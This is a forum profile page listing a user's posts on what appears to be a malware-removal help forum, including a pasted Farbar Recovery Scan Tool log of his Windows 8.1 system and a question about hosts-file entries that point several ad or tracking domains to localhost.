Jump to content

Stan-Lee

Members
  • Content Count

    13
  • Joined

  • Last visited

About Stan-Lee

  • Rank
    New Member

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. non that i have noticed thank you so much.
  2. GOOD DAY I ran the fixlist through the comand prompt in the RE. And also the scan. attached is the frst and addition .txt Addition.txt FRST.txt
  3. AND PLEASE SIR, I'M WORRIED ABOUT THIS FROM THE ADDITION.TXT ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2013-08-22 14:25 - 2019-02-05 00:52 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts 127.0.0.1 space1.adminpressure.space 127.0.0.1 trackpressure.website 127.0.0.1 htagzdownload.pw 127.0.0.1 texttotalk.org 127.0.0.1 360devtraking.website 127.0.0.1 room1.360dev.info 127.0.0.1 djapp.info 127.0.0.1 technologievimy.com WHAT DOES IT MEAN?????
  4. NEW ADDITION.TXT Additional scan result of Farbar Recovery Scan Tool (x64) Version: 17.02.2019 Ran by #Strazzo.RoseGold## (18-02-2019 01:28:43) Running from C:\Users\Stanley\Downloads\FRST Windows 8.1 Enterprise (Update) (X64) (2018-05-03 16:52:27) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= #Strazzo.RoseGold## (S-1-5-21-1692593245-3285590566-2148222763-1001 - Administrator - Enabled) => C:\Users\Stanley Administrator (S-1-5-21-1692593245-3285590566-2148222763-500 - Administrator - Enabled) => C:\Users\Administrator Guest (S-1-5-21-1692593245-3285590566-2148222763-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1692593245-3285590566-2148222763-1003 - Limited - Disabled) RoseGold (S-1-5-21-1692593245-3285590566-2148222763-1004 - Administrator - Enabled) => C:\Users\RoseGold ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B} AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) µTorrent (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\uTorrent) (Version: 3.5.5.44994 - BitTorrent Inc.) 1.1.3 (HKLM-x32\...\{A4046FE1-986B-4463-B4DD-CFA473A7056B}_is1) (Version: - PDFZilla) 7-Zip 15.14 (HKLM-x32\...\7-Zip) (Version: 15.14 - Igor Pavlov) Ability Mail Server 4.2.6 (HKLM-x32\...\Ability Mail Server 4_is1) (Version: - Code Crafters Software Limited) Adobe Flash Player 20 ActiveX & Plugins 64-bit (HKLM\...\Adobe Flash Player ActiveX) (Version: 20.0.0.286 - Adobe Systems Incorporated) Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.) Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.) BlackBerry 10 Desktop Software (Blend, Link, Drivers) (HKLM-x32\...\{c33e77db-89b5-4abf-a1d1-97f8b35347e1}) (Version: 1.2.0.52 - BlackBerry) BlackBerry Blend (HKLM-x32\...\{1DA42C01-4ED2-4B4E-B90C-18FCBA12FC41}) (Version: 1.2.0.50 - BlackBerry Ltd.) Hidden BlackBerry Communication Drivers (HKLM-x32\...\{46CD5A63-0C1F-45C3-B643-CA87A17275C0}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden BlackBerry Device Drivers (HKLM-x32\...\{1F6490E5-7540-426D-BC1E-EB57B0BF0C38}) (Version: 8.0.0.143 - BlackBerry Ltd.) Hidden BlackBerry Link (HKLM-x32\...\{C42468F9-9812-4550-A54B-5DDB062EB10F}) (Version: 1.2.4.39 - BlackBerry) Hidden BlackBerry Link Remover (HKLM-x32\...\{44D65CAB-1BC8-47B7-BF5B-3EB8B6BB0276}) (Version: 1.2.4.0 - BlackBerry Ltd.) Hidden Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) FlashPeak Slimjet (HKLM-x32\...\Slimjet) (Version: 7.0.1.0 - FlashPeak Inc.) GLO 3G PLUS (HKLM-x32\...\GLO 3G PLUS) (Version: 11.300.05.03.251 - Huawei Technologies Co.,Ltd) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 72.0.3626.109 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.23 - Google Inc.) Hidden HP Hotkey Support (HKLM-x32\...\{6E7401DB-B722-4428-BE94-DD4740CF6464}) (Version: 5.0.28.1 - Hewlett-Packard Company) HP Software Framework (HKLM-x32\...\{886D1141-25E5-431F-8326-C3DB6FFCCAF0}) (Version: 4.0.96.1 - Hewlett-Packard Company) HP Support Solutions Framework (HKLM-x32\...\{930B5F2B-8DB9-42F4-90E4-5D3DC30541C3}) (Version: 12.10.49.21 - HP Inc.) HP System Event Utility (HKLM-x32\...\{29E20347-C62F-4657-938E-876A182B67F1}) (Version: 1.4.13 - HP Inc.) iCloud (HKLM\...\{05D97028-FD26-4A3D-BADC-D1CA2E9F1214}) (Version: 7.10.0.9 - Apple Inc.) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation) Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.) iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.) KeePass Password Safe 2.39.1 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.39.1 - Dominik Reichl) LSI HDA Modem (HKLM\...\LSI Soft Modem) (Version: 2.2.100 - LSI Corporation) Malwarebytes version 3.7.1.2839 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.7.1.2839 - Malwarebytes) Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1 (1033)) (Version: - ) Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM-x32\...\M2698023) (Version: - ) Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM-x32\...\M2833941) (Version: - ) Microsoft .NET Framework 1.1 Security Update (KB979906) (HKLM-x32\...\M979906) (Version: - ) Microsoft .NET Framework 1.1 SP1 (HKLM\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: - ) Microsoft .NET Framework 1.1 SP1 (HKLM\...\Microsoft .NET Framework 1.1 (1033)) (Version: - ) Microsoft Office Professional Edition 2003 (HKLM-x32\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{1a63c099-febd-4eaf-83ad-a82ea4fdac49}) (Version: 12.0.30501.0 - Корпорация Майкрософт) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{b55f7208-e02b-4828-ac78-59c73ddf5bc7}) (Version: 12.0.30501.0 - Корпорация Майкрософт) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23026 (HKLM-x32\...\{e46eca4f-393b-40df-9f49-076faf788d83}) (Version: 14.0.23026.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation) OpenVPN 2.4.6-I602 (HKLM\...\OpenVPN) (Version: 2.4.6-I602 - OpenVPN Technologies, Inc.) Opera Stable 58.0.3135.65 (HKLM-x32\...\Opera 58.0.3135.65) (Version: 58.0.3135.65 - Opera Software) PowerISO (HKLM-x32\...\PowerISO) (Version: 7.2 - Power Software Ltd) Registry Recycler (HKLM-x32\...\Registry Recycler_is1) (Version: 0.9.3.1 - Developer Tribe (Pvt) Ltd.) SAM CoDeC Pack (HKLM\...\SAM CoDeC Pack) (Version: 5.85 - www.SamLab.ws) Skype version 8.39 (HKLM-x32\...\Skype_is1) (Version: 8.39 - Skype Technologies S.A.) SmarterMail Sync for Outlook 2003 and above (HKLM-x32\...\{6567F265-62EC-4BA9-9629-6B483B608854}) (Version: 1.0 - Smarter Tools) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.19.65 - Synaptics Incorporated) Syncios 6.5.8 (HKLM-x32\...\Syncios) (Version: 6.5.8 - Anvsoft) Syncios Data Recovery 2.0.5 (HKLM-x32\...\06d5deef-8cb6-52ed-a43f-f181f836384a) (Version: 2.0.5 - Syncios Data Recovery) TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - ) TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.53254 - TeamViewer) VLC media player (HKLM\...\VLC media player) (Version: 3.0.6 - VideoLAN) WhatsApp (HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\WhatsApp) (Version: 0.3.1409 - WhatsApp) WinAce Archiver (HKLM-x32\...\WinAce Archiver) (Version: 2.69 - e-merge GmbH) Windows Driver Package - Google Corporation (androidusb) USB (11/11/2015 1.0.0020.00000) (HKLM\...\964D20A0C219E8C327639DBA3C1FD49434216922) (Version: 11/11/2015 1.0.0020.00000 - Google Corporation) Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass (11/11/2015 2.0.0020.00000) (HKLM\...\B02D55DC05C888A284041A2F8A294C0D557A218C) (Version: 11/11/2015 2.0.0020.00000 - Google, Inc.) Windows Driver Package - SAMSUNG Electronics Co., Ltd. (ssudmdm) Modem (08/24/2016 2.12.4.0) (HKLM\...\B8C7DCAC7E5C993BD8367E5832C6C99E0B248D7A) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. ) Windows Driver Package - SAMSUNG Electronics Co., Ltd. (WinUSB) AndroidUsbDeviceClass (08/24/2016 2.12.4.0) (HKLM\...\609138CA03F1F9B54E04FA4DAB7C0C3F28DE9464) (Version: 08/24/2016 2.12.4.0 - SAMSUNG Electronics Co., Ltd. ) WinRAR 5.30 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ShellIconOverlayIdentifiers: [IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2014-04-21] (Tonec Inc. -> Tonec Inc.) ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) ContextMenuHandlers1-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll -> No File ContextMenuHandlers1-x32: [PhotoStreamsExt] -> {89D984B3-813B-406A-8298-118AFA3A22AE} => C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll [2019-01-15] (Apple Inc. -> Apple Inc.) ContextMenuHandlers1-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd) ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) ContextMenuHandlers4-x32: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP3\System\aimp_menu64.dll -> No File ContextMenuHandlers4-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd) ContextMenuHandlers4-x32-x32: [ZFAdd] -> {8FF88D27-7BD0-11D1-BFB7-00AA00262A11} => C:\Program Files (x86)\WinAce\arcext.dll [2007-11-08] (e-merge GmbH) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2015-06-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers6-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2015-12-31] (Igor Pavlov) ContextMenuHandlers6-x32: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-02-01] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers6-x32: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => C:\Program Files\PowerISO\PWRISOSH.DLL [2018-06-17] (Power Software Limited -> Power Software Ltd) ContextMenuHandlers6-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2015-11-18] (win.rar GmbH -> Alexander Roshal) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {019A414B-EDCF-464E-A4FF-6E1780935AB0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe (HP Inc. -> HP Inc.) Task: {121858E1-B466-49DB-ABBF-BE0AD32980CE} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001UA => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe Task: {44D766A4-890D-4187-8209-27B0E5320737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe (Apple Inc. -> Apple Inc.) Task: {4759FCE5-417F-4558-A8AE-4C124D2B53A7} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated) Task: {4B307496-C19B-4F0D-8A51-8EA93C3082D4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.) Task: {531B0429-4A10-4627-84B1-F2408752272D} - System32\Tasks\HPCeeScheduleFor#Strazzo.RoseGold## => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe (Hewlett-Packard Company -> HP Inc.) Task: {766C85C7-D024-4937-AD2A-1D565A0EFE0E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.) Task: {7F232E68-AE32-41F8-B98F-689DC0D3D5E5} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe (HP Inc. -> HP Inc.) Task: {8292C123-B9AC-4784-B31B-420E6D1FFE44} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe (HP Inc. -> HP Inc.) Task: {83DEE68E-A3DD-4AE5-9A83-06EC0861E6BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe (Google Inc -> Google Inc.) Task: {9983ADBE-CDF4-4EB7-BA08-126F95152E4E} - System32\Tasks\Opera scheduled Autoupdate 1525449700 => C:\Program Files\Opera\launcher.exe (Opera Software AS -> Opera Software) Task: {B5D3DB14-5265-4538-9CB9-FDAA4A1D4D8B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe (HP Inc. -> HP Inc.) Task: {C28388CC-478E-460F-BC73-1BB706E4CB8B} - System32\Tasks\{C2F55618-3604-4E37-AF83-6C71B337894D} => C:\Windows\system32\pcalua.exe -a C:\Users\Stanley\Downloads\Programs\ability-mail-server\setup.exe -d C:\Users\Stanley\Downloads\Programs\ability-mail-server Task: {DA1D9517-63D2-4DD4-B496-824CB060ABE0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe (HP Inc. -> HP Inc.) Task: {DCD49F79-E1DD-40AB-8653-E3D1BA2C9E1F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.) Task: {E6E376AE-3FCC-45F3-89EB-014031777959} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe (HP Inc. -> HP Inc.) Task: {E9BDD47D-D63C-4F59-8B54-0B30B7E5D664} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1692593245-3285590566-2148222763-1001Core => C:\Users\Stanley\AppData\Local\Google\Update\GoogleUpdate.exe (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\HPCeeScheduleFor#Strazzo.RoseGold##.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe+HPCeeScheduleFor#Strazzo.RoseGold## (null)!STRAZZOWEEZY\#Strazzo.Ros ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) Shortcut: C:\Users\Stanley\AppData\Roaming\Microsoft\Windows\Network Shortcuts\My Web Sites on MSN\target.lnk -> hxxp://www.msnusers.co ShortcutWithArgument: C:\Users\Stanley\Desktop\Chrome Plus - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Default" ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1" ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP 2 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2" ShortcutWithArgument: C:\Users\Stanley\Desktop\WORKHARDGROUP 3 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 3" ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x0000002a hxxp://www.yandex.ru/?win=331&clid=2100779 ShortcutWithArgument: C:\Users\Stanley\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.InternetExplorer.Default\Яндекс.Почта.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> -contentTile -formatVersion 0x00000002 -pinnedTimeLow 0x97d444c2 -pinnedTimeHigh 0x01cd8430 -securityFlags 0x00000000 -url 0x00000038 hxxp://mail.yandex.ru/?win=331&clid=2100779&from=dist_tl ==================== Loaded Modules (Whitelisted) ============== 2018-05-16 02:59 - 2018-05-16 02:59 - 000088888 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2019-01-15 01:27 - 2019-01-15 01:27 - 001356088 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2018-04-26 17:24 - 2018-04-26 17:24 - 000226208 _____ () C:\Program Files\OpenVPN\bin\liblzo2-2.dll 2018-04-26 17:24 - 2018-04-26 17:24 - 000127488 _____ () C:\Program Files\OpenVPN\bin\libpkcs11-helper-1.dll 2015-06-02 05:00 - 2015-06-02 05:00 - 000102912 _____ () C:\Windows\System32\IccLibDll_x64.dll 2019-01-23 16:33 - 2019-01-23 16:33 - 000088888 _____ () C:\Program Files\iTunes\zlib1.dll 2019-01-23 16:33 - 2019-01-23 16:33 - 001356088 _____ () C:\Program Files\iTunes\libxml2.dll 2019-02-15 00:30 - 2019-01-25 16:36 - 002845712 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll 2019-02-15 00:30 - 2019-01-24 11:09 - 002714000 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll 2019-02-15 00:15 - 2019-02-13 06:14 - 005186032 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.109\libglesv2.dll 2019-02-15 00:15 - 2019-02-13 06:14 - 000117232 _____ () C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.109\libegl.dll 2015-05-26 16:46 - 2015-05-26 16:46 - 000094208 _____ () C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\libxpmux.dll 2018-04-12 18:06 - 2019-02-08 19:51 - 001837672 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\ffmpeg.dll 2019-02-14 02:43 - 2019-02-08 19:51 - 002400096 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\skypert.dll 2019-02-14 02:42 - 2019-02-08 19:51 - 000097840 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keytar\build\Release\keytar.node 2019-02-14 02:42 - 2019-02-08 19:51 - 000219696 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\electron-ssid\build\Release\electron-ssid.node 2019-02-14 02:42 - 2019-02-08 19:51 - 000081768 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\desktop-idle\build\Release\desktopIdle.node 2019-01-15 01:28 - 2019-01-15 01:28 - 001042744 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll 2019-01-15 01:28 - 2019-01-15 01:28 - 000189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll 2018-05-16 02:59 - 2018-05-16 02:59 - 000076088 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2018-04-12 18:06 - 2019-02-08 19:51 - 002901504 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll 2018-04-12 18:06 - 2019-02-08 19:51 - 000015360 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll 2019-02-14 02:42 - 2019-02-08 19:51 - 000405056 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\@paulcbetts\spellchecker\build\Release\spellchecker.node 2019-02-14 02:42 - 2019-02-08 19:51 - 000138816 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keyboard-layout\build\Release\keyboard-layout-manager.node 2019-02-14 02:42 - 2019-02-08 19:52 - 003257192 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\Processing.NDI.Lib.x86.dll ==================== Alternate Data Streams (Whitelisted) ========= (If an entry is included in the fixlist, only the ADS will be removed.) ==================== Safe Mode (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\38318503.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\38318503.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Association (Whitelisted) =============== (If an entry is included in the fixlist, the registry item will be restored to default or removed.) ==================== Internet Explorer trusted/restricted =============== (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\.DEFAULT\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\localhost -> localhost ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2013-08-22 14:25 - 2019-02-05 00:52 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts 127.0.0.1 space1.adminpressure.space 127.0.0.1 trackpressure.website 127.0.0.1 htagzdownload.pw 127.0.0.1 texttotalk.org 127.0.0.1 360devtraking.website 127.0.0.1 room1.360dev.info 127.0.0.1 djapp.info 127.0.0.1 technologievimy.com ==================== Other Areas ============================ (Currently there is no automatic fix for this section.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Stanley\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img4.jpg DNS Servers: 192.168.8.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == If an entry is included in the fixlist, it will be removed. MSCONFIG\Services: TeamViewer => 2 MSCONFIG\Services: TenorshareWinAdService => 2 MSCONFIG\Services: WsAppService => 2 MSCONFIG\startupreg: utweb => "C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe" /MINIMIZED HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "utweb" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "IncrediMail" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "RIMDeviceManager" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "QTWQA7PTCRBGCEE" ==================== FirewallRules 